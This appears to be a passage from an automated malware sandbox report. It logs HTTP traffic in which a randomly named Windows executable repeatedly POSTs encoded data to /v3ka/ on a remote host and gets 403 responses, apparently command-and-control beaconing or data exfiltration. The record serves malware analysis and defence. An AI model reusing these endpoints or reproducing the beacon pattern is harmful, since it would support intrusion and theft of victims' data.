Feb 28, 2024 15:50:22.881855965 CET	1286	IN	Data Raw: 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 Data Ascii: ort" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href
Feb 28, 2024 15:50:22.881907940 CET	164	IN	Data Raw: 78 3b 22 20 63 6c 61 73 73 3d 22 73 75 62 2d 68 65 61 64 65 72 20 74 65 78 74 2d 62 6c 6f 63 6b 2d 6e 61 72 72 6f 77 22 3e 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61 Data Ascii: x;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	50281	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:28.113737106 CET	724	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 45 41 77 43 32 7a 73 4a 50 73 43 55 42 35 63 76 31 57 4f 50 71 47 36 45 7a 64 6d 39 51 38 45 68 72 43 48 74 7a 38 61 64 68 6f 54 43 2f 4a 6b 6d 50 32 4e 50 4d 6c 41 71 4a 51 4c 72 5a 6c 56 43 53 4b 35 6f 74 4d 4f 42 2b 70 4d 4e 7a 72 58 57 54 74 52 73 48 37 2b 73 38 65 70 70 73 4f 4d 36 37 49 48 36 78 47 2b 43 6e 4a 67 5a 39 6b 6f 48 2b 44 78 6b 45 63 5a 78 47 61 6f 6d 74 34 35 4c 38 4c 55 6a 42 64 4d 43 59 53 57 77 55 54 78 30 42 32 30 79 32 4d 2b 31 46 58 71 76 48 54 48 5a 7a 75 56 4c 6f 45 6c 37 63 66 39 76 56 6e 57 68 35 4d 4e 6f 62 67 3d 3d Data Ascii: nf8dPP8p=3s5zHo3CKggsEAwC2zsJPsCUB5cv1WOPqG6Ezdm9Q8EhrCHtz8adhoTC/JkmP2NPMlAqJQLrZlVCSK5otMOB+pMNzrXWTtRsH7+s8eppsOM67IH6xG+CnJgZ9koH+DxkEcZxGaomt45L8LUjBdMCYSWwUTx0B20y2M+1FXqvHTHZzuVLoEl7cf9vVnWh5MNobg==
Feb 28, 2024 15:50:29.797306061 CET	324	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 14:50:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: namecheap-nginx Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	50282	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:30.859256029 CET	1064	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 73 68 6f 67 66 74 79 39 61 64 6b 6f 54 43 77 70 6b 76 46 57 4d 44 4d 6c 4e 5a 4a 55 4c 72 5a 6c 70 43 54 34 78 6f 35 73 4f 4f 78 4a 4d 4f 30 72 58 74 58 74 52 59 48 37 36 42 38 65 4e 70 73 39 59 36 36 4c 76 36 69 6a 53 44 74 4a 67 66 73 30 70 52 33 6a 78 6d 45 63 56 50 47 62 52 62 74 75 52 4c 35 62 30 6a 41 64 4d 42 53 69 57 7a 61 44 78 6a 42 55 64 42 76 39 71 71 45 6b 65 47 4f 41 66 34 75 4f 55 48 6c 79 5a 7a 44 4d 31 44 53 56 2f 7a 73 59 41 61 4c 6e 2b 45 4b 78 73 43 63 59 4b 45 6c 5a 63 2f 79 72 75 4d 51 2f 67 65 73 79 47 68 63 35 48 4a 51 63 4e 53 6a 62 72 52 6a 7a 65 68 70 79 73 4a 70 4c 72 6a 43 4f 6d 36 49 62 6e 6c 4a 69 4d 30 31 56 42 52 2f 72 56 75 75 39 77 32 32 7a 54 57 32 44 78 56 50 76 69 59 75 32 30 64 64 73 4e 74 75 70 47 33 37 37 68 56 47 79 74 5a 34 63 4b 65 59 2b 69 36 2f 35 41 46 67 30 37 4d 30 36 79 6e 77 65 51 59 4b 76 6d 2b 66 64 37 42 34 45 33 72 4f 68 4d 4d 75 71 41 37 53 47 72 46 63 7a 41 35 53 61 4b 50 73 55 65 4e 58 34 6a 4b 6d 46 76 33 7a 51 50 70 33 4c 38 53 2f 74 66 57 73 61 6c 6e 38 4e 6a 39 5a 78 63 54 45 54 4c 4b 68 38 37 6d 49 4e 33 73 4c 63 32 42 33 39 34 65 6e 58 4a 34 7a 38 45 46 6c 73 6f 44 49 59 4a 2f 67 54 6d 6b 68 2f 78 35 62 32 55 71 6c 52 72 79 30 4b 41 33 4d 48 52 72 74 30 53 65 2b 59 2b 4a 79 4b 53 72 4b 67 64 6d 31 33 37 39 31 2b 64 49 6c 62 42 56 37 4e 46 79 59 4e 58 34 77 77 41 70 2f 41 4e 4f 43 38 2b 76 74 6a 7a 41 6c 72 4d 6a 6f 48 56 44 4c 6d 38 6a 56 32 32 44 33 2b 50 68 2f 33 4e 74 45 44 65 4d 76 4b 30 3d Data Ascii: nf8dPP8p=3s5zHo3CKggsHhAC6wUJKMCbNZcvsmODqG2EzczlQvshogfty9adkoTCwpkvFWMDMlNZJULrZlpCT4xo5sOOxJMO0rXtXtRYH76B8eNps9Y66Lv6ijSDtJgfs0pR3jxmEcVPGbRbtuRL5b0jAdMBSiWzaDxjBUdBv9qqEkeGOAf4uOUHlyZzDM1DSV/zsYAaLn+EKxsCcYKElZc/yruMQ/gesyGhc5HJQcNSjbrRjzehpysJpLrjCOm6IbnlJiM01VBR/rVuu9w22zTW2DxVPviYu20ddsNtupG377hVGytZ4cKeY+i6/5AFg07M06ynweQYKvm+fd7B4E3rOhMMuqA7SGrFczA5SaKPsUeNX4jKmFv3zQPp3L8S/tfWsaln8Nj9ZxcTETLKh87mIN3sLc2B394enXJ4z8EFlsoDIYJ/gTmkh/x5b2UqlRry0KA3MHRrt0Se+Y+JyKSrKgdm13791+dIlbBV7NFyYNX4wwAp/ANOC8+vtjzAlrMjoHVDLm8jV22D3+Ph/3NtEDeMvK0=
Feb 28, 2024 15:50:31.195075035 CET	324	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 14:50:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: namecheap-nginx Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	50283	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:50:33.620800018 CET	2572	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 30 68 6f 56 44 74 7a 65 79 64 6e 6f 54 43 39 4a 6b 69 46 57 4e 5a 4d 6c 56 47 4a 55 48 37 5a 6a 6c 43 54 72 6c 6f 35 2f 32 4f 36 70 4d 4c 6f 37 58 56 54 74 52 4d 48 37 2b 56 38 64 77 63 73 4f 45 36 37 4a 33 36 78 6b 6d 43 73 5a 67 5a 73 30 70 57 7a 6a 78 55 45 63 52 66 47 62 64 62 74 6f 52 4c 2f 35 38 6a 47 4b 34 42 66 53 57 73 63 7a 78 6d 49 30 64 34 76 38 4f 45 45 6b 65 38 4f 44 54 34 75 4a 67 48 6b 31 31 77 44 73 31 44 4d 46 2f 30 39 49 45 65 4c 6e 79 6d 4b 78 6f 43 63 66 57 45 33 70 63 2f 35 75 61 50 45 76 67 59 6e 53 48 68 4e 70 37 42 51 63 49 6c 6a 5a 6e 52 6a 48 32 68 70 42 55 4a 36 71 72 6a 63 2b 6d 34 56 4c 6e 4d 41 43 4e 31 31 55 78 33 2f 6f 64 51 75 2b 38 32 30 53 7a 57 39 42 4a 61 50 50 69 65 68 57 30 49 5a 73 42 78 75 6f 72 6d 37 37 68 46 47 33 4e 5a 2f 74 36 65 5a 38 4b 31 37 70 41 66 35 6b 36 57 39 61 2f 6d 77 61 77 51 4b 76 75 55 66 63 76 42 33 45 33 72 49 41 4d 50 67 61 41 38 50 57 71 63 53 54 41 75 53 61 48 6d 73 52 2b 6e 58 4d 72 4b 6e 31 2f 33 6b 51 50 71 79 72 38 4a 32 4e 66 63 37 4b 6c 6e 38 4e 6e 50 5a 78 59 54 45 68 62 4b 6e 4c 66 6d 4e 65 66 73 4a 63 32 48 33 39 34 4c 6e 57 31 39 7a 2f 6c 6b 6c 73 34 70 49 62 6c 2f 67 47 4f 6b 6d 2b 78 32 66 47 55 76 68 52 72 62 72 61 4e 74 4d 48 4e 6a 74 30 44 6c 2f 71 36 4a 7a 4b 43 72 4f 67 64 6c 77 58 37 36 68 75 64 65 76 37 4d 4f 37 4e 5a 4d 59 4e 6a 4f 77 79 77 70 2f 6e 6b 79 52 76 79 30 35 78 6e 32 6e 71 39 55 35 32 39 32 42 47 41 6e 56 45 69 2b 30 62 66 51 34 48 39 38 59 51 32 62 79 4b 4b 47 47 59 6e 65 43 4c 6c 65 67 4e 41 2f 42 46 42 66 51 54 56 50 31 6c 41 67 71 44 4f 6c 67 7a 4c 66 62 79 65 44 55 5a 62 4d 6d 30 70 4b 6e 4b 33 6b 55 52 4d 46 48 55 48 51 4b 48 33 56 4a 5a 70 36 49 44 50 58 41 4a 58 5a 54 67 62 2b 53 5a 65 77 44 35 64 52 5a 4d 7a 46 34 6c 63 35 43 77 63 52 46 75 34 58 38 2f 73 42 59 4d 77 7a 34 2f 67 41 39 76 4e 4b 53 5a 78 75 46 4d 65 6c 4f 37 48 7a 5a 49 42 45 2b 75 73 75 6e 6c 42 58 4f 47 70 62 69 65 79 35 75 43 56 53 36 43 4e 36 4c 46 69 2b 30 48 5a 58 59 6f 54 58 30 56 46 76 53 53 76 5a 44 38 4b 72 49 2f 2f 4b 55 68 41 63 4a 65 6f 2b 59 43 74 69 73 76 6d 6c 33 62 76 63 7a 76 70 79 59 4f 6b 38 57 67 70 79 70 4e 72 42 4c 53 74 46 79 32 37 33 77 39 53 79 2f 6d 46 4a 71 42 46 4d 67 6e 6b 72 6b 6a 50 72 74 6a 4e 48 44 6a 4e 39 4f 6a 76 42 52 74 6c 63 2b 31 59 30 37 39 51 61 4a 38 38 49 72 76 66 77 6a 35 46 70 72 75 5a 6c 30 2f 32 4b 6d 2f 6e 57 61 71 42 37 52 72 56 58 63 33 61 4b 71 44 32 69 58 4a 73 54 6b 66 38 51 36 30 67 52 6a 44 63 62 74 39 6f 57 32 4b 2b 44 32 48 32 5a 44 74 4d 39 75 76 65 6a 4b 51 44 77 39 63 32 58 70 37 48 31 38 6f 6b 6f 53 68 52 32 39 57 57 49 79 47 74 2b 32 79 2f 52 49 6c 37 6e 41 69 62 6b 33 69 76 71 34 2b 59 56 63 71 79 41 66 44 6b 2b 70 77 50 37 55 37 51 52 2b 51 4d 79 42 35 6d 38 56 34 41 64 6e 44 72 37 6d 34 48 4c 2f 47 4b 4b 34 58 72 54 62 50 33 55 42 69 77 50 75 50 54 55 62 55 37 58 31 6f 34 64 79 2f 34 54 55 69 48 76 79 4d 4c 34 5a 4f 67 61 65 71 73 30 6c 41 36 43 41 6f 4a 79 7a 53 70 64 52 71 68 78 6e 41 73 58 6f 71 4a 63 4e 51 57 55 55 33 36 49 58 4a 31 41 66 38 50 61 42 64 4e 6d 47 2f 31 73 71 6f 76 50 56 67 66 52 64 30 59 74 51 36 38 73 57 34 2b 32 78 5a 58 48 6a 45 53 59 2f 73 68 6c 55 70 75 75 57 45 30 68 47 45 42 41 73 50 55 2b 31 45 6a 64 4c 2f 53 35 52 39 2f 54 61 43 33 36 58 2f 32 69 54 74 32 6a 72 79 73 39 47 6a 44 48 66 2b 39 41 37 36 74 44 79 6b 39 68 35 75 68 4b 34 63 6d 39 5a 78 43 36 44 2f 73 4f 65 37 6e 58 43 53 34 50 52 58 65 67 79 43 77 5a 49 2f 54 44 56 4e 68 6b 55 31 41 30 4c 55 45 2b 45 6f 78 54 38 34 64 66 44 50 4e 31 54 63 57 6f 6d 48 4f 62 48 62 45 79 44 51 6c 33 52 33 56 63 52 53 5a 75 57 58 2f 51 42 4d 72 4a 5a 34 32 78 63 7a 52 4f 52 71 4f 59 56 78 52 32 35 52 47 73 74 61 59 7a 39 4b 6b 53 4e 79 43 63 61 30 46 47 42 38 6d 42 4c 59 79 57 53 47 70 76 6e 32 61 65 38 48 71 55 75 67 47 33 70 51 69 4b 44 69 56 58 4f 66 47 46 6c 54 39 2f 76 64 6e 62 4d 32 63 41 6a 61 50 6b 30 71 41 78 78 41 30 49 79 56 32 4f 59 71 6b 38 48 42 Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:50:33.620896101 CET	10288	OUT	Data Raw: 77 5a 6d 41 58 32 4f 67 49 67 51 48 48 2f 6c 6a 52 33 69 77 70 4f 2b 45 44 48 5a 73 68 69 76 45 58 6b 6c 51 58 62 78 79 37 74 6c 6d 48 79 47 37 51 46 58 4b 32 39 61 6f 4b 75 50 6a 33 6f 6f 48 43 76 4c 78 75 4a 65 73 6f 56 39 2f 45 34 50 38 6f 48 Data Ascii: wZmAX2OgIgQHH/ljR3iwpO+EDHZshivEXklQXbxy7tlmHyG7QFXK29aoKuPj3ooHCvLxuJesoV9/E4P8oHcpRqOPjdqNCjLHRLUCB4n4KYvVkuE6HMu+WX6msV/oOYsaNXuf+PBurIAWJfRbsQ7h2Gs2uBXK6871MwNVMdYNMKPVh8rNrbhDKwhzYx5t8rFIfEn7W2o0MXmJcKjlSOB463F9S7wsT/EYM/GMf1LUnHfb8k8wX/5
Feb 28, 2024 15:50:33.851948977 CET	7716	OUT	Data Raw: 4a 6d 72 45 34 51 43 4d 4c 45 31 47 54 34 2b 30 7a 54 4b 79 6b 4c 69 39 75 75 5a 53 48 59 46 6f 6e 2b 34 33 41 6d 7a 68 46 56 50 35 6e 5a 4f 49 35 46 57 78 68 66 7a 50 74 62 32 77 6a 35 49 76 4e 42 73 43 6f 64 47 49 47 57 69 71 69 4c 73 5a 4a 39 Data Ascii: JmrE4QCMLE1GT4+0zTKykLi9uuZSHYFon+43AmzhFVP5nZOI5FWxhfzPtb2wj5IvNBsCodGIGWiqiLsZJ9vXthP1ufzX7XYiYOdd2rEhtDDg7C67XK7wO22h6nkJaHiiZ+odbm7947Hf4LHCz80kj+LquGdZtT0lLM6kA+/GwVWoVzFcgPVT2wkU7+czvnadK545lBT/eydf9m7R9kZs1nnBf0EqM3FRVxaGduttRFAZRA4b9Qf
Feb 28, 2024 15:50:33.852148056 CET	2572	OUT	Data Raw: 4f 35 4a 77 30 71 48 4f 67 35 76 61 42 4b 6c 43 34 76 37 50 70 78 66 78 4a 51 65 57 55 4d 58 2f 52 38 44 6d 32 68 6e 35 38 74 53 74 65 30 62 41 36 52 58 76 76 31 77 52 50 59 2f 75 47 76 32 35 66 35 64 53 5a 36 74 74 63 48 58 63 45 71 68 70 43 75 Data Ascii: O5Jw0qHOg5vaBKlC4v7PpxfxJQeWUMX/R8Dm2hn58tSte0bA6RXvv1wRPY/uGv25f5dSZ6ttcHXcEqhpCuINFe2NiLtHf4u3LRKgxO6mJ0dz6WwbnXfrB7k/lkGFoXrriAdYlRRhkWUnRZlpQV/lX+V2mTwPjk0t2R+5zd+tfJoXQ6hpJwk48ETkYNnw6ucjAVBx7fKJfIz57Nc68EOmPL4nl0PTGnMZD+zZmguDoBQj221zC4Z
Feb 28, 2024 15:50:33.852327108 CET	7716	OUT	Data Raw: 58 74 52 35 37 4b 67 4d 58 36 79 41 32 56 31 41 38 39 66 30 66 4b 71 55 39 36 52 59 34 4f 2b 2b 61 6e 72 33 2b 56 33 7a 42 69 4c 66 51 65 53 34 70 47 56 48 75 77 6c 43 61 37 66 54 79 48 7a 48 38 75 77 72 36 30 6d 5a 54 42 39 51 57 6f 4f 6b 32 53 Data Ascii: XtR57KgMX6yA2V1A89f0fKqU96RY4O++anr3+V3zBiLfQeS4pGVHuwlCa7fTyHzH8uwr60mZTB9QWoOk2SQrHVuLGSwKmeNmHCCRDcebclaSxCD0kwHS7Cl/NjrAabRx+e4wb+kneHFq7gKR/5wLukw3XKXDrRij5ZaRR0gG9HtwSq3kyTdXNyl+gCnmOmihwppMYS7D+66Rg8AMhd6lHS30IvxZyWo9IyYzd9q/Aa0T21fCrF7
Feb 28, 2024 15:50:33.852400064 CET	1286	OUT	Data Raw: 78 45 79 56 77 76 50 6b 54 6d 68 6e 55 55 68 67 72 49 49 48 42 4c 4d 52 36 69 6f 49 32 36 71 33 67 2f 6c 61 61 75 6a 53 76 6e 4a 69 78 74 4b 43 4f 67 5a 44 47 48 41 2f 48 66 71 51 62 74 46 62 6d 4c 49 42 41 55 75 52 38 6b 62 37 79 6c 73 53 4f 71 Data Ascii: xEyVwvPkTmhnUUhgrIIHBLMR6ioI26q3g/laaujSvnJixtKCOgZDGHA/HfqQbtFbmLIBAUuR8kb7ylsSOqRfZKgcywvGw6u5PJ0RIyojFBOB/MpksHjfiIR/g5vcv8bzyyI/qzesQAhqgfPBTMEOsTAxa7Lih+OhVRsiEpfK6mjxrABLkBtbEdxokH4KCqZNqpjmswHlNUBCKz9lA+8CHfV3XwQRWYBCMZN19NtmMj+RWLz/e+x
Feb 28, 2024 15:50:33.852643013 CET	6430	OUT	Data Raw: 4c 6e 52 42 57 31 5a 4c 65 6b 4b 47 4d 32 78 5a 6f 75 55 34 34 42 49 4e 52 53 71 56 5a 62 43 63 4d 47 39 57 65 7a 77 51 67 66 55 4d 59 57 43 76 58 5a 6e 52 6b 74 6d 53 78 67 55 34 33 52 34 46 69 63 59 78 4f 64 79 36 6a 49 54 67 30 50 6c 6e 30 73 Data Ascii: LnRBW1ZLekKGM2xZouU44BINRSqVZbCcMG9WezwQgfUMYWCvXZnRktmSxgU43R4FicYxOdy6jITg0Pln0sGHEWsmqlzSv+CeeaD2nb8iF3CQbe6qEFeu80ll7RIgov2Hk8b6n+9X1Vpw2/4K/6gkbTlHHPidFgfRFW7sf86+4YUB7/djSdA9rIRM3iMxlotnRVfX1ml0vysUJhpnxEf1hFRFcyJnypYSzcK61aC9tsQgxdNyNWu
Feb 28, 2024 15:50:34.090703964 CET	2572	OUT	Data Raw: 67 2f 4e 59 36 72 31 34 37 44 78 34 44 55 4e 33 4a 6e 75 61 30 6c 49 53 69 66 58 79 56 74 34 48 4c 75 47 6d 2f 61 4f 64 54 64 57 2f 2f 63 6d 77 48 6b 7a 41 66 68 4d 61 65 52 71 35 67 54 68 77 59 43 74 6b 70 38 48 74 35 31 37 69 4d 6d 38 7a 49 77 Data Ascii: g/NY6r147Dx4DUN3Jnua0lISifXyVt4HLuGm/aOdTdW//cmwHkzAfhMaeRq5gThwYCtkp8Ht517iMm8zIwnhvxcj7on/b76vwFBmG2aqftZuz5L6yrjoDQ9NA/r/pvIvsJL0CSRUhEx2onypEGIMj3Sx59OivjrBWllwk6DVteRCawh9+5h3dmcXbYAekwB7PJuvnXpTGB2MfxNPlyLUkuhloj07EZrHqJyN03wSL+IoQpTjDED
Feb 28, 2024 15:50:34.090878010 CET	5144	OUT	Data Raw: 56 32 39 55 74 32 61 31 66 49 72 59 4b 35 6a 51 47 34 4f 59 79 39 30 71 49 37 50 71 51 43 6f 47 72 54 47 73 2f 47 57 77 65 31 59 77 66 64 4b 51 74 7a 72 74 78 6a 43 51 6f 51 41 61 41 74 4d 74 71 62 49 78 62 66 51 43 64 65 58 70 77 57 6c 42 55 42 Data Ascii: V29Ut2a1fIrYK5jQG4OYy90qI7PqQCoGrTGs/GWwe1YwfdKQtzrtxjCQoQAaAtMtqbIxbfQCdeXpwWlBUBJp1NDxRXq6nwYyeox8p376t5z4UMpO28m4sIDsFjxAPjemP/D/T8GXrVmRL8AiVyhbE2fHWAD4LHcGwQlNIev2w0h95uAikk45saP0O6NeCXVISIGtOwjVQEHsQdiyAeMOEYAfDeJaAszUIyQ6ZAqWz8PfowRPzDm
Feb 28, 2024 15:50:34.091190100 CET	7165	OUT	Data Raw: 34 6d 6b 42 47 32 2f 63 77 62 4e 6c 6f 78 4c 45 56 56 53 47 78 72 47 75 6c 30 33 4f 31 44 75 58 64 6f 6b 2f 51 4a 75 43 46 46 2f 4f 66 37 6b 49 35 4e 78 35 74 42 6e 4d 36 4e 41 48 46 4d 61 72 74 55 76 4f 34 72 44 74 79 4c 33 75 4a 75 69 2b 35 55 Data Ascii: 4mkBG2/cwbNloxLEVVSGxrGul03O1DuXdok/QJuCFF/Of7kI5Nx5tBnM6NAHFMartUvO4rDtyL3uJui+5U24FveofFkOP1JbxXTu26Xr3w6sTmEe3hwNeOIV385buSOD5EDG1dU31BqqBkUC3IV62IfHLNCXoBZw3a7KGxs+0UIuePKUfiYh5mLJe+fz3AwgBN9Jy7oeAH3GzQbPe9iAw5WG6VJXsk30PEWOJdR+dBBMU73aLNU
Feb 28, 2024 15:50:34.544177055 CET	324	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 14:50:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: namecheap-nginx Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 